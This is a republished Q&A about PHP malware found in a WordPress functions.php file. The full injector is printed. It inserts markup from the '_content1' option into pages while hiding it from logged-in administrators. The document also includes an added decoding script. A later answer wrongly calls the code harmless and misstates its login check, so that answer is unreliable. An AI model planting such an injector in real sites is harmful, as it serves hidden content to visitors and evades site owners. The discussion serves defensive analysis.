Question

I have discovered some malicious code in a client's functions.php file. What is this doing? I have no idea. I'm OK with PHP but no expert for sure. Any ideas?

if (!function_exists("b_call")) {
    function b_call() {
        if (!ob_get_level()) ob_start("b_goes");
    }
    function b_goes($p) {
        if (!defined('wp_m1')) {
            if (isset($_COOKIE['wordpress_test_cookie'])
                || isset($_COOKIE['wp-settings-1'])
                || isset($_COOKIE['wp-settings-time-1'])
                || (function_exists('is_user_logged_in') && is_user_logged_in())
                || (!$m = get_option('_content1'))
            ) {
                return $p;
            }
            list($m, $n) = @unserialize(trim(strrev($m)));
            define('wp_m1', $m);
            define('wp_n1', $n);
        }
        if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
        if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
        return $p;
    }
    function b_end() {
        @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action("init", "b_call");
    add_action("wp_head", "b_call");
    add_action("get_sidebar", "b_call");
    add_action("wp_footer", "b_call");
    add_action("shutdown", "b_end");
}

Solution

It allows for pulling whatever is saved in the options table in the column _content1 to be added as content into the header, footer, etc. of the WordPress theme.

Whoever injected the code most likely set some HTML to the _content1 option, like a Viagra ad, or they have another script on the server waiting to update the option. You probably want to look for strange .php files in the root of your site. There may be a simple eval($_REQUEST) waiting for you.
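
The decoding and cloaking logic of the injected code, as an added example that is not part of the question or the answers: it reverses the `strrev`/`unserialize` encoding of the `_content1` value for inspection and mirrors the cookie guard in `b_goes()`. The function names `decode_content1` and `injection_skipped` and the sample value are assumptions made for illustration.

```php
<?php
// Added example (not from the original post). The sample value is constructed.

// Undo the strrev()/unserialize() encoding the injected code applies to the
// `_content1` option, without letting attacker-controlled data create objects.
function decode_content1(string $raw): ?array
{
    $data = @unserialize(trim(strrev($raw)), ['allowed_classes' => false]);
    if (!is_array($data) || !isset($data[0], $data[1])) {
        return null; // not the two-element list that list($m, $n) expects
    }
    if (!is_string($data[0]) || !is_string($data[1])) {
        return null;
    }
    return [
        'inserted_before_head_close' => $data[0], // becomes wp_m1
        'inserted_after_body_open'   => $data[1], // becomes wp_n1
    ];
}

// Mirror of the guard at the top of b_goes(): true means the page is returned
// untouched, which is the case for anyone carrying WordPress login cookies.
function injection_skipped(array $cookies, bool $loggedIn, bool $optionSet): bool
{
    foreach (['wordpress_test_cookie', 'wp-settings-1', 'wp-settings-time-1'] as $name) {
        if (isset($cookies[$name])) {
            return true;
        }
    }
    return $loggedIn || !$optionSet;
}

// Constructed stand-in for get_option('_content1'); harmless placeholders only.
$raw = strrev(serialize(['<!-- head placeholder -->', '<!-- body placeholder -->']));

foreach (decode_content1($raw) ?? [] as $where => $markup) {
    echo $where, ': ', $markup, PHP_EOL;
}

$views = [
    'admin browser (has wordpress_test_cookie)' => ['wordpress_test_cookie' => 'x'],
    'anonymous visitor or crawler (no cookies)' => [],
];
foreach ($views as $who => $cookies) {
    $state = injection_skipped($cookies, false, true) ? 'clean page' : 'injected page';
    echo $who, ': ', $state, PHP_EOL;
}
```

On an affected site the input would be the raw `_content1` option value. Because of the cookie guard, confirming the injection means viewing the page in a session that carries no WordPress cookies.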

Other tips

It is pulling in content from the WordPress option field _content1 if the user is logged in. It is also adding new line characters after the body, head and div tags. So far as I can tell there is no malicious code. The strangest code in that block is the OB code, which is just functions for PHP's output buffer - which is also not malicious.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow